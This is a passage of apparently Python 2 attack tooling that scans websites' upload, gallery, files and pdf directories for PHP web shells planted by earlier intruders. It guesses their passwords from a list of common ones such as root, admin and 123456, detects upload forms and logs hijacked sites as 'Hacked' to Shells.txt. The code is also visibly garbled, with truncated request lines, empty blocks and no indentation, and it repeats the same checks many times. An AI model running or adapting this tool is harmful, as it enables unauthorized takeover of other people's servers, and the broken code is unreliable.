if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
upload_check = requests.get(SH8_O,timeout=15).content
if 'Index of' in upload_check and '.php' in upload_check :
shells = []
if re.findall(pattern_php,upload_check):
shells = re.findall(pattern_php,upload_check)
for shell in shells:
sh_check = requests.get(SH8_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
gallery_check = requests.get(SH9_O,timeout=15).content
if 'Index of' in gallery_check and '.php' in gallery_check :
shells = []
if re.findall(pattern_php,gallery_check):
shells = re.findall(pattern_php,gallery_check)
for shell in shells:
sh_check = requests.get(SH9_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
files_check = requests.get(SH10_O,timeout=15).content
if 'Index of' in files_check and '.php' in files_check :
shells = []
if re.findall(pattern_php,files_check):
shells = re.findall(pattern_php,files_check)
for shell in shells:
sh_check = requests.get(SH10_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
pdf_check = requests.get(SH11_O,timeout=15).content
if 'Index of' in pdf_check and '.php' in pdf_check :
shells = []
if re.findall(pattern_php,pdf_check):
shells = re.findall(pattern_php,pdf_check)
for shell in shells:
sh_check = requests.get(SH11_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
